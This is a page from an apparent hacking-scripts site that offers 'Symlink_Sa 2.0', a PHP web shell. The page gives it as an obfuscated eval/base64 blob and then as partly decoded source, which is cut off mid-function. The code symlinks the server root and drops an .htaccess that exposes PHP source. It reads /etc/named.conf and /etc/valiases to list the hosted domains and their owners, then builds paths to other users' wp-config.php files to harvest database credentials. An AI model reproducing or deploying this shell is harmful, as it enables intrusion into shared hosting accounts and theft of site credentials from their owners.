HackingScripts

Hack Scripts for everybody

Symlink_Sa 2.0 Shell

12 Feb 2014

This Symlink_Sa 2.0 Shell was coded by Mr.Alsa3ek and Al-Swisre.

Symlink_Sa 2.0 Shell (encrypted)

1 <?php /* Cod3d by Mr.Alsa3ek and Al-Swisre  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x2f24;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDlmKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==cBYPdZEmwtF7tLnzcbOgfolsca9SDB1pftIXhTShkrlkUAlkUAlkUAlkdtE9wtfPfuOXKJ8vkZ4Lb1YyAlcyAlSmA0aUaLaUb05nTAAmbU4Lb1YyAlcyAlSmALaOaAaTay9aALLmbTShkrlkUAlkUAlkUAlkHT1lGunSd2OlhtFvkZXLUAlkUAlkUAlkUAlSwtL7tJOkUAlkUAlkUAlkUBXINbY0Fl9ZcbnSCBYlhtOkUAlkUAlkUAlkUTydC291dmWPkrlkUAlkUAlkUAlkHULsHa0SkZFSkrlkUAlkUAlkUAlkdtEpKXP7cBYPdZEmwtE8wAONW1OcArAIDuOsdtnWaAkHUAHIwJ0vR1FzWZ8vOyOrwyiwar1HwerVHtnTfukpC3WvR0aKwI0hwtEIwtkPfuOXKJ8vf3f3RmFzRM9ZcZ9AAJ94DuOsdervOyOrR3iPfo1SHU1zfukpC3WVcuOLwj4YtI0hNoi0dBXIGo1SdmH9wMi0fuE6RZ93f3FVfzHVd3kmRzr5KTLvGoi0dBXJNI0heWP8Doaice4Ytjx0DbOScT5TGB1SDB5qb1YiwewVHeXvfol0doA+eWPYtjxzfulScUn0GbnlNUk0cbi0R2YzFZw+eWPYtJEIDuOsdtxJd2O5wuSYtJEIwtEIdByZc2lVKJEXKX0hwtEIwtnXCBOLDB5mKJEXKX0hwtEIwtnvfbOSDB5lKJEXKX0hgW0heWPYtMkvcuLIGX0hwtEIwoOpFMajfolvdjPIduOZKX0hwtEIwokiC2smFM91dMWsC29Sd3w6w0C0OjOoYeSYtIljd2xvFjPIFMfJher1HZXIHTAzRtExYTHpKX0hwtEIwuOlGuWsCBxpc246woYldmOlFI0hgW0heWppdmn1ftx0cbi0CbklCUxzcBxlC3O7eWpMd250RbflDBfPfePICM9SceSYtMYvdo9ZKJEjHTrxHTrxKX0hcoyzDoaLwtYMcMcMcMC7eWpJd3kLcbw6weyXGE0hF29SDBWIw0ktWLktWjSYtMkiC2smFM91dMWsC29Sd3w6wtYrOrOrOrW7eWp9eWPYtI0hRMilcuwIGX0hwtnMd250RBcidBlSGTPIaoyPd21iRtnnFMlidtXIF2yVFZ1zcbkpcJEIKX0hwtnMd250RbYpGMA6wewZFuI7eWPYtI0hgW0heWPVC29VftniGX0heWPIfoa4ft1LcBYvFMy0DB9VKJnVd25lKX0hwoYvdo9ZKmkmCJIxYTHSwer1HZXIHTAzhTSYtJnMd250RBcidBlSGTPIaoyPd21iRtnnFMlidtXIF2yVFZ1zcbkpcJEIKX0hwocvdmWsF2l6cTPIHTcXGeSYtJn0cbi0RbYPCBOvfzPIHun4wenXGtEzFuIIKX0hgW0heWPVC29VftniKMivfMaZGX0heWPYtJEIC29Sd3w6wtYyOAayOAAIKX0hwtn0cbi0RbYPCBOvfzPXFuIIHun4weYXGtEjHeEXHeEXweSYtI0heWp9eWPYtJ50dbEIfuwIfoO7eWPYtMkvFMOlFjPIF29SDBWIHbn4wtYtWLktWLw7eWPYtmnicoOpdMF6wekXGtE7eWPIwocvdmWsF2l6cTPIHTYXGeSYtm0YtI0hRmOsFtn0FJn0ctniwuSYtJEIfoa4ft1LcBYvFMy0DB9VKJnVd25lKX0heWPYtI0hgW0heWPVcM90cbk7eWPIwocvdmWsF2l6cTPIKbn0KX0hwtnjd2xvFjPIw0ynWAynWUE7eWPIwuOlGuWsCBxpc246woYldmOlFI0hgW0heWPVfo1XwuOZwuOLKMivfMaZGX0heWpJd3IsF2iico93KJEXFuIIHun4weOXGtEjKeI4KeI4KX0heWp9eWPVcM90GX0heWpMd250RBcidBlSGTpACBivdBrSwryZDBySRtnzCB5zRbYlFMlMKX0heWPIwocvdmWsF2l6cTPIHTYXfeSYtm0YtI0hRMlZwuSYtJEIC29Sd3w6wtYoOjEXHeE7eWp9eWPYtI0heWP8R3Y0GBxlNI0heWP8R2ilCBW+eWPYtjxJd2O5NI0heWP8col2woYSCbYzNaXmCBxSbtF+eWPYtI0hkzShWo1qcolZhtfzGB0mReE3YzFpKXPLUAlkUAlkUAlkUBXxwtE9wtkNFuOpd25zwoySdtnFdJnrDbklC3OvFmlkdMOlGtnTfbIVDuOsdtnFdJnncoOAGbnlwuOlGuWvFoxiDB4IRmnPFtnFdJnncoOwCB5LdoaZwuYlFmclFJ1XCbkzcBWIRmnPFtnFdJEIWBOLaulXcUn0cbi0R3nSCBlVwt5Pfo1SwyxVwryLcriidMOScbwIfui0wt5Pfo1SwyxVwyklFbapFMAITM9VcUnFdJnTCbOpF2c5wryVGUw7tJOkUAlkUAlkUAlkHALINAnMd3nldJEPk3Y5dU8VDuOiC2YlF3HmRtf3kZL7tMc3FMl0cUILUAlkUAlkUAlkUTykwtXLUAlkUAlkUAlkUBXxhTShWuY5dBxpdMSPkZ8mRtfzGB0vFM9vftFpKXPLUAlkUAlkUAlkdrlSwe0ICMyzcB5idBAPb19oUAxyb18pKXplC2ivwtF8CmwIRz48col2woYSCbYzNUkPcBOZwj4IA3lsdolVDZnTCUEZRjEINokZwt8+Nt9LDbC+kzShcBYPdZEmNokZwt8+NoOpfJnjdoyzFz0JDoaLFJw+RTpdwyazcbwIkJnrd21iDB5zwtCIA3lsdolVDZnfKJ08CmwIRz48CmwIRz48R2Opfj4mKXplC2ivwtF8col2woYSCbYzNUkjd250wj4YtI0hBzxiwoiZcBC9wj8JNJnwd21lweXvCT5feWPYtlS8CUnPFMaMNUw/F3fzNbY5dUw+wyazcbwIkJnrd21iDB5zwtCIA3lsdolVDZE8R2r+bW0heWpdNorIDuklcj0JN3Y3Fz1zcBHJNJnrd21iDB5zwtCIA2YZDbn0weXvCT5feWPYtlSINorIDuklcj0JN3Y3Fz1MDBxlwj4IA3lsdolVDZnoDBxlweXvCT5fNokZwt8+NokZwt8+NokZwt8+eWPYtI0heWPYtI0heWP8R2Opfj4mKXppcJipF3YlftILb1kyAaayA1Odk3Y3FZffhULhGXpzf2l0C2IIhtOgALaOaAaTaySmF3fzk10ptmShC2yzcUEmF2ajkzPhkrlkUAlkUAlkUBxSUUE9wrnMDBxlhtFvcbOjR25idBaLRMYvdMCmhTShDBCPwUOkUAlkUAlkUAlSdrLptmShcollwtIJwoYidJf0wuklCBWIR2a0CZ9VCB1lct5jd25MwJL7tm0hcBxzcWp7tMajDo8IwjxLDbCIC2xiF3H9k3OsFtF+eWP8foyJdoAICBxpc249k2YldmOlFJFIf2lLfoI9kzWXkUF+NuOLNJnrd21iDB5zweXvfoW+NuOLNJnTC3kpFuWINt90ce4JKXpMd3klCBYPhtOkUAlkUAlkUAlSdrLICbHIkrlkUAlkUAlkUBxSHUl7tMlMhoaZcBfphtf6d25lkZXLUAlkUAlkUAlkdoXxhUl7tmnZcBfgdBy0C2igCBxShtFjGM9VcUEJht4QhUwjkZXLUAlkUAlkUAlkdoXxRtOkUAlkUAlkUAlSHTrpKXpMduazDtIpKXppcJizfukScB4PfukpdUILUAlkUAlkUAlkderxBzyfBznfhULINjwpGXPLUAlkUAlkUAlkHALxwe0IFo9zDbigc2a0Fuf1DBWPWocpdoavf25lFJImR2a0CZ92CBxpCbYlFZ8mRJOkUAlkUAlkUAlSHTydHa1dHy0phTShkrlkUAlkUAlkUTySHT0LUAlkUAlkUAlkUAlSRJFvF3lsR3kvd3WvDo9scU8mRJOkUAlkUAlkUALxUTydk25idBAmbU4mR3n1CMxpC19Pfo1SR3fXRBYvdMcpcZ5XDuEmKXPLUAlkUAlkUAlkHTykNBflfy9PcByLcbkzhtOkUAlkUAlkUALxderpKXPLUAlkUAlkUAlkHTySNUOkUAlkUAlkUALxHAldHy07tJOkUAlkUAlkUALxHTr9krlkUAlkUAlkUAlkdt4mR3Y5dU9Zd290R2ivdBAvkZ4LUAlkUAlkUAlkHALxBZfVCB1lk10VkZ9XfBkSDBYgDuOsdt9Jdo9mR3fXRBYvdMcpcZ5XDuEmKXPLUAlkUAlkUAlSUAlkNBflfy9PcByLcbkzhtOkUAlkUAlkUALxHTrpKXPLUAlkUAlkUAlSUAlSNUOkUAlkUAlkUBxkUAldHy07tJOkUAlkUAlkUBxkUTr9krlkUAlkUAlkUAlkdt4mR3Y5dU9Zd290R2ivdBAvkZ4LUAlkUAlkUAlkHALxBZfVCB1lk10VkZ9XfBkSDBYgDuOsdt9jd25MDBf1FMy0DB9VRmnPFtF7tJOkUAlkUAlkUBxkdrL9c2a0b2ilCBOlFmHPkrlkUAlkUAlkdrlkHUL7tJOkUAlkUAlkUBxkdoX9krlkUAlkUAlkdrlSUaSXbTShkrlkUAlkUAlkdrlSHT0LUAlkUAlkUAlkUAlSRJFvF3lsR3kvd3WvDo9scU8mRJOkUAlkUAlkUALxUTydk25idBAmbU4mR3n1CMxpC19Pfo1SR2pvd21SCU9jd25MDBf1FMy0DB9VRmnPFtF7tJOkUAlkUAlkUBxkHAL9c2a0b2ilCBOlFmHPkrlkUAlkUAlkdrlSHUL7tJOkUAlkUAlkUBxkHBX9krlkUAlkUAlkdrLxUaSXbTShkrlkUAlkUAlkdrLxHT0LUAlkUAlkUAlkUAlSRJFvF3lsR3kvd3WvDo9scU8mRJOkUAlkUAlkUALxUTydk25idBAmbU4mR3n1CMxpC19Pfo1SR2lVC2x1coazR2YvdMcpcZ5XDuEmKXPLUAlkUAlkUAlSdrlkNBflfy9PcByLcbkzhtOkUAlkUAlkUBxkHTrpKXPLUAlkUAlkUAlSdrlSNUOkUAlkUAlkUBxSUAldHy07tJOkUAlkUAlkUBxSUTr9krlkUAlkUAlkUAlkdt4mR3Y5dU9Zd290R2ivdBAvkZ4LUAlkUAlkUAlkHALxBZfVCB1lk10VkZ9XfBkSDBYgDuOsdt92CJ9pdMYSfBOlFZ9jd25MDBFVFoiXkzShkrlkUAlkUAlkdoxSUT1mcbOgDoaicoaZFZILUAlkUAlkUAlSdrLxhTShkrlkUAlkUAlkdoxSde0LUAlkUAlkUAlSdoxkBznfKXPLUAlkUAlkUAlSdoXxNUOkUAlkUAlkUAlkUBXVkZ9zGB0vFM9vft9Pd21lRZFVkrlkUAlkUAlkUTykHaSmdMyscUffRJFvFuaJdoljb2i0dBXvcM9ZfB0vDB5jduaLcbHvC29VcMlmRmnPFtF7tJOkUAlkUAlkUBxSHAL9c2a0b2ilCBOlFmHPkrlkUAlkUAlkdoxSHUL7tJOkUAlkUAlkUBxSHBX9krlkUAlkUAlkdoXxUaSXbTShkrlkUAlkUAlkdoXxHT0LUAlkUAlkUAlkUAlSRJFvF3lsR3kvd3WvDo9scU8mRJOkUAlkUAlkUALxUTydk25idBAmbU4mFuaJdoljb2i0dBXvC2xpcB50FZ9jd25MDBf1FMy0DB9VRmnPFtF7tJOkUAlkUAlkUBXxUAL9c2a0b2ilCBOlFmHPkrlkUAlkUAlkdoXxHUL7tJOkUAlkUAlkUBXxUBX9krlkUAlkUAlkdeykUaSXbTShkrlkUAlkUAlkdeykHT0LUAlkUAlkUAlkUAlSRJFvF3lsR3kvd3WvDo9scU8mRJOkUAlkUAlkUALxUTydk25idBAmbU4mR3n1CMxpC19Pfo1SR3Y1FunvFmWvC29VcMlmfbkifolvdJ5XDuEmKXPLUAlkUAlkUAlSHAlkNBflfy9PcByLcbkzhtOkUAlkUAlkUBXxUTrpKXPLUAlkUAlkUAlSHBxkNUOkUAlkUAlkUBXxUAldHy07tJOkUAlkUAlkUBXxdoX9krlkUAlkUAlkUAlkdt4mR3Y5dU9Zd290R2ivdBAvkZ4LUAlkUAlkUAlkHALxBZfVCB1lk10VkZ9XfBkSDBYgDuOsdt9jdolldmWvC29VcMlmfbkifolvdJ5XDuEmKXPLUAlkUAlkUAlSHBXxNBflfy9PcByLcbkzhtOkUAlkUAlkUBXxdoXpKXPLUAlkUAlkUAlSHTykNUOkUAlkUAlkUBXxdeydHy07tJOkUAlkUAlkUBXxHBX9krlkUAlkUAlkUAlkdt4mR3Y5dU9Zd290R2ivdBAvkZ4LUAlkUAlkUAlkHALxBZfVCB1lk10VkZ9XfBkSDBYgDuOsdt9zfBksDbO0DBYqcbWVFoiXkzShkrlkUAlkUAlkderxHT1mcbOgDoaicoaZFZILUAlkUAlkUAlSHTyShTShkrlkUAlkUAlkHAlkUT0LUAlkUAlkUAlSHTrxBznfKXPLUAlkUAlkUALxUAlSNUOkUAlkUAlkUAlkUBXVkZ9zGB0vFM9vft9Pd21lRZFVkrlkUAlkUAlkUTykHaSmdMyscUffRJFvFuaJdoljb2i0dBXvC2xpcB50R2YvdMcpc3aZCbOpd24VFoiXkzShkrlkUAlkUAlkHAlkHT1mcbOgDoaicoaZFZILUAlkUAlkUALxUAlShTShkrlkUAlkUAlkHAlSUT0LUAlkUAlkUALxUALxBznfKXPLUAlkUAlkUALxUBxSwe0IF3OZFo9zhtOkUAlkUAlkUALxHBXSkzwXHtFpKXPLUAlkUAlkUALxUTykNUFMdMkzFeSmKXppcJEPF3OZFo9zhtOkUAlkUAlkUALxHBXSkzwXHtFpwe09wuOZfBAIhWp7tJOkUAlkUAlkUTykHAL9wjxiwoiZcBC9kZwVkrlkUAlkUAlkUTySHU4JkZn0CbkmcbW9k19JdoyVDZF+a29ZcunZcbYzNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdrlkdtXmHjEXkZLINT0Ifuk1cULhGXPLUAlkUAlkUALxUTykNUw8CUnPFMaMNUFJRJOkUAlkUAlkUALxHTrVwJFIfoyZc2a0NUfgCMxidMSmNlfvFMOXFMazFzXvCT4JKXp9tMaSF2apcJEPF3OZFo9zhtOkUAlkUAlkUBxkdoXSkzwXHtFpwtE9NUn0FmalwoyVctnzfukXd3HPkrlkUAlkUAlkHAlkUUXmHjEXkZLIwe09wuOZfBAIhWp7tJOkUAlkUAlkUTykHAL9wJE8CUnPFMaMNUFJRJOkUAlkUAlkUBXxHBXVwJFIfoyZc2a0NUfgCMxidMSmNlfwTAYTNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdeySUUXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUUE9wJE8CUnPFMaMNUFJRJOkUAlkUAlkUBXxUTrVwJFIfoyZc2a0NUfgCMxidMSmNlfwTAYTNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkderxUUXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUUE9wJE8CUnPFMaMNUFJRJOkUAlkUAlkUBXxdoXVwJFIfoyZc2a0NUfgCMxidMSmNlfwTAYTNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdrlSdtXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUT0JwexiwoiZcBC9kZwVkrlkUAlkUAlkdrlkHU4JkZn0CbkmcbW9k19JdoyVDZF+UM9vdBxiNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdrLxdtXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUT0JwexiwoiZcBC9kZwVkrlkUAlkUAlkdrlSHU4JkZn0CbkmcbW9k19JdoyVDZF+UM9vdBxiNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdoxkdtXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUT0JwexiwoiZcBC9kZwVkrlkUAlkUAlkdrLxHU4JkZn0CbkmcbW9k19JdoyVDZF+fLk1doxlfolVNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdoxSdtXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUT0JwexiwoiZcBC9kZwVkrlkUAlkUAlkdoxkHU4JkZn0CbkmcbW9k19JdoyVDZF+fLk1doxlfolVNt9iNJw7tm0hcBxzcBlMwtizfukXd3HPkrlkUAlkUAlkdoXxdtXmHjEXkZLIwe09wuOZfBAptmShkrlkUAlkUAlkHALxUT0JwexiwoiZcBC9kZwVkrlkUAlkUAlkdoxSHU4JkZn0CbkmcbW9k19JdoyVDZF+fLk1doxlfolVNt9iNJw7tm0hcBxzcWp7tMYvdmOpdmalKXp9tJOkUAlkUAlkUTykHBXINUELUAlkUAlkUAlkHALxBZfVCB1lk10IKXplC2ivwtF8fuw+NuOLNjxiwoiZcBC9DuO0FePvR3f3fZ4mRJOkUAlkUAlkUAlSHTydHa1dHy0VkZ8+kZ4LUAlkUAlkUAlkderxBzyfBznfRJF8R2r+Nt90ce4Ytjx0ce4mRJOkUAlkUAlkUTykHALVkzXvfoW+Nt90Fj4mK2cSfbYPhtL7tm0hgWp9tm0hCmklCBS7tMYiF2AIk3Y5dUF6tJOkUAlkUAlkUAlSdrLINUnEcMlScUImR2a0CZ9VCB1lct5jd25MkZL7tMlMhtrLUAlkUAlkUAlkdoxkhWp7tMOpcUEPwJnjCB4mftnZcByLwt9lfoHvdMyscBWVC29VcJwpKXp9tMaSF2AhGXplC2ivwtw8col2woYSCbYzNUf0dbEmNjx0CBkScUnidolmdj0mC2aVfoaZkZn3DBO0De0mYeElkz48foW+Oo9sCBlVFzXvfoW+NuOLNlazcbkzNt90ce48foW+F3lsdolVDZE8R3OLNJw7tMcvFMaiC2IPkrlkUAlkUAlkUBxSUUniFZELUAlkUAlkUAlkdoXxhbShDBCPcbklc2LPk3pvdMAmRtOkUAlkUAlkUAlSderphbShFuklc19sCbOjDy9idoXPkZY6d25lwtwPRJPpwJHmRtOkUAlkUAlkUAlSderSkrlkUAlkUAlkUBXxHUL7tMcSfbYPhtL7tMlMhuY0FMxldJi0FMlshtOkUAlkUAlkUAlSHTydHa1dHy0phUE+HJl7tJOkUAlkUAlkUALxUTrINUnXd3YpGy9mcbOXf3apctiEcMlScB93dMaZhtFvcbOjR3cidoliF2azRZFVkrlkUAlkUAlkUBXxHaSxbaSXbULpKXPLUAlkUAlkUALxUTySwe0IkrlkUAlkUAlkUTykHaSmdMyscUffweShWuY5dBxpdMSPkZ8mRtfzGB0vFM9vftFpKXPLUAlkUAlkUALxUTySwe0IkrlkUAlkUAlkUBXxHaSxbaSXbTShkrlkUAlkUAlkHALxHUE9wtfFRMlZkzShkrlkUAlkUAlkHBxkUUE9wtfFRMlSkzShDBCIhoaZcBfphtwLUAlkUAlkUALxUTrxwJXLUAlkUAlkUAlkderxBzyfBznfhUnvFJnlFMamDUIJkrlkUAlkUAlkHBxkUUwSkrlkUAlkUAlkUBXxHaSxbaSXbULIhWp7tJOkUAlkUAlkUTykHBXINUEJNoOpfJnzfulScT0mwoYvdo9ZKJEjOLCXHeEXweSIfoa4ft1zDoyLd3F6wenXGtEXFuIIHbn4wuklceSIkz4JRJOkUAlkUAlkUAlSHTydHa1dHy0VkzXvcol2NJF7tm0hcBYPdZEJeWP8fuw+eWPYtjx0ce4YtjxLDbCIC2xiF3H9k2OvdUF+NorIfoyZc2a0NUfgCMxidMSmwoiZcBC9DuO0FePvR3f3fZ4JRJOkUAlkUAlkUAlSHTydHa1dHy0VkZ8+kZ4LUAlkUAlkUALxUTySRJFINt9iNJE8R2Opfj4YtjXvfoW+eWPYtI0hNuOLNI0hkZ4LUAlkUAlkUAlkHALxBZfVCB1lk10VwI0hNt90ce4YtI0heWPYtI0heWPYtjx0ce4YtjxiwoiZcBC9k3Y5dU9Zd290R2ivdBAvwJ4LUAlkUAlkUAlkHALxBZfVCB1lk10VwJ9XfBkSDBYgDuOsdtFIfoyZc2a0NUfgCMxidMSmNmY5dBxpdMSINt9iNI0hNt90ce4YtI0heWP8R3OZNjXvcol2NJEJKXpMduazDtIpKXp9tm0hgWp9tMkZcByqKXpjCbYlwtfMDBxlkzPhcBYPdZEmeWpADoAIcMlScUnXCbOPwuOvwuY5dBxpdMSYtI0hNokZwt8+NokZwt8+eWP8cM9ZdUnscbOPd2W9wmnvF3WJNI0hNolVFua0wuO5FoA9wmOlGuWJwo5idBA9wMcpdoAJwucidualNUwvDo9scU91F2aZR3n1CMxpC19Pfo1SR2cpdoAVdMyscUwIF2l6cT0JYjEJRz48CmwIRz48CmwIRz4Ytjxpdmn1ftn0GbnlNUk0cbi0wJnVCB1lNUkzGB1MDBxlwJn2CBx1cT0JcMlScU5VCB1lb3Y5dUEPwra4RJE6KJExRmO4ftEpwJnzDbplNUw2HtwvNjxJFJEvNjxJFJEvNI0hNolVFua0wuO5FoA9wmY1CM1pftwIfMySfBA9wmY5dBxpdMSJwo5idBA9wmY5dBxpdMSJwt8+wexJFJEvNjxJFJEvNI0heWPYtI0hNt9Md3ksNI0hkzShkrlkUAlkUAlkHBxkdtE9wtOgAr9TaySmcMlScUffKXPLF3lscMlScUE9wtOgAr9TaySmF3lscMlScUffKXPLF3lsdolVDZE9wtOgAr9TaySmF3lsdolVDZffKXppcJEPkuY5dBxpdMSptmShWuY5dBxpdMSPwJOkUAlkUAlkUTySUBXJRtkzGB0vkuY5dBcpdoAJhTShcBYPdZEmNokZwt8+NorIfoyZc2a0NUkgCMxidMSJwoiZcBC9wmY5dU8mRJOzGB1MDBxlRJFJwe4mRJOzGB1MDBxlRJF8R2r+kzShgWpJFMaiDzShcoaMCbaSfePhDoaicoaZhtkHd2YifolvdjPIkrlkUAlkUAlkUBxkdtwpKXp9tm1lduYltmShcBYPdZEmNocvFM0ICBY0DB9VNUwJwo1lfoivce0JFo9zftwIcB5jfulXcT0JdbaSfolXCbk0R2cvFM0scoy0CUwIdMyscT0JfbnSd2yLcbwJwolLNUk1FoxvCBOlFJw+kzShcBYPdZEmNolVFua0wuO5FoA9wMcpdoAJwo5idBA9wMcpdoAJwucidualNUkeDo9vF2AIcMlScUwIF2l6cT0JYjEJwe48DB5XfbWIdMyscT0Jb3aXdtwIfulXcT0JF3aJdBl0wJnpce0Jb3aXdtwIfMySfBA9wlaXdo9ictw+Nt9Md3ksNJF7tMlMhtELb1nNA1Odk191FoXmbUE9NUEmabnSd2yLkZLIGXppcJiEC29XGUILb0ckTraTBZfMDBxlk11dk3OsFy9VCB1lk10Sky9oUAxyA1SmcMlScUffBZfVCB1lk10phUn7cBYPdZEmNokZwt8+NokZwt8+Now+abnSd2yLcBWIF3ajC2azF2c1dtEiwTxJFj48Cmw+kzs9tMaSF2AIG2ajDo8IkzxJFJEvNjxJFJEvNL5vftn1FoxvCBOlctEiwTxJFj48Cmw+kzs9tm0hcBYPdZEmeWP8CmwIRz48CmwIRz48col2woYSCbYzNUkMd3WJNLYvceYLwok5wr1ZRLySF2rzcBSICB5LwrySRaY3DbYZcW0hNokZwt8+NokZwt8+eWpYfbYSDB1zwriiC2slFmH8R2Opfj4IkzShgWP7cBYPdZEmeWPYtjXvcol2NI0heWPYtjXvCM9LGT4YtI0hNt9Pfo1SNI0hkzS=alVnRPIq

Symlink_Sa 2.0 Shell (decrypted)

  1 <?php echo ' ';
  2 @set_time_limit(0);
  3 $IIIIIIIIIIIl = 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  4 $IIIIIIIIIII1 = explode('/', $IIIIIIIIIIIl);
  5 $IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1) - 1], '', $IIIIIIIIIIIl);;
  6 echo '  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  7     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  8 
  9 <html xmlns="http://www.w3.org/1999/xhtml">
 10 
 11 <head>
 12 <title>Symlink_Sa 2.0</title>
 13 
 14 <style type="text/css">
 15 
 16   html,body {
 17      margin: 0;
 18      padding: 0;
 19      outline: 0;
 20 }
 21 
 22 
 23 body {
 24     direction: ltr;
 25     background-color:#F4F4F4;
 26    color: rgb(153, 153, 153);
 27     text-align: center
 28 }
 29 
 30 input,textarea,select{
 31 font-weight: bold;
 32 color: #111111;
 33 dashed #ffffff;
 34 border: 1px
 35 solid #BBBBBB;
 36 background-color: #DDDDDD;
 37 }
 38 
 39 
 40 .hedr {
 41   font-family: Tahoma, Arial, sans-serif  ;
 42   font-size: 22px;
 43 
 44 
 45 }
 46 
 47 .cont a{
 48 
 49  text-decoration: none;
 50  color:rgb(153, 153, 153);
 51  font-family: Tahoma, Arial, sans-serif  ;
 52  font-size: 16px;
 53  text-shadow: 0px 0px 3px ;
 54 }
 55 
 56 .cont a:hover{
 57 
 58 
 59   color: #EEEEEE ;
 60   text-shadow:0px 0px 3px #000000 ;
 61 
 62 
 63 }
 64 
 65 .tmp tr td{
 66 
 67 border: solid 1px #BBBBBB;
 68 
 69 padding: 2px ;
 70   font-size: 13px;
 71 }
 72 
 73 .tmp tr td a {
 74   text-decoration: none;
 75 
 76 
 77 
 78 }
 79 
 80 .foter{
 81   font-size: 9pt;
 82   color: #AAAAAA ;
 83   text-align: center
 84 }
 85 
 86 .tmp tr td:hover{
 87 
 88 box-shadow: 0px 0px 4px #888888;
 89 
 90 }
 91 .fot{
 92 
 93 font-family:Tahoma, Arial, sans-serif;
 94 
 95   font-size: 13pt;
 96 }
 97 
 98 .ir {
 99   color: #FF0000;
100 }
101 
102 
103 
104 </style>
105 
106 </head>
107 
108 <body>
109 
110 <div class=\'all\'>
111 
112 
113 ';
114 @mkdir('sym', 0777);
115 $IIIIIIIIIIl1 = "Options all 
116  DirectoryIndex Sux.html 
117  AddType text/plain .php 
118  AddHandler server-parsed .php 
119   AddType text/plain .html 
120  AddHandler txt .html 
121  Require None 
122  Satisfy Any";
123 $IIIIIIIIII1I = @fopen('sym/.htaccess', 'w');
124 fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
125 @symlink('/', 'sym/root');
126 $IIIIIIIIIlIl = basename('index.php');
127 echo '<br /><div class="hedr"> Symlink Sa 2.0 <br /></div>';
128 echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>';
129 echo '<div class="cont">
130 
131 [<a href="?"> Home </a>]
132 
133 [<a href="?sws=sym"> User & Domains & Symlink </a>]
134 
135 [<a href="?sws=sec"> Domains & Script </a>]
136 
137 [ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />
138 
139 </div>';
140 if (isset($_REQUEST['sws'])) {
141     switch ($_REQUEST['sws']) {
142         case 'sec':
143             $IIIIIIIIIllI = @file('/etc/named.conf');
144             if (!$IIIIIIIIIllI) {
145                 die(" can't read /etc/named.conf");
146             } else {
147                 echo "<div class='tmp'>
148 <table align='center' width='40%'><td> Domains </td><td> Script </td>";
149                 foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) {
150                     if (eregi('zone', $IIIIIIIIIll1)) {
151                         preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11);
152                         flush();
153                         if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) {
154                             $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0]));
155                             $IIIIIIIII1l1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/wp-config.php';
156                             $IIIIIIIII11I = get_headers($IIIIIIIII1l1);
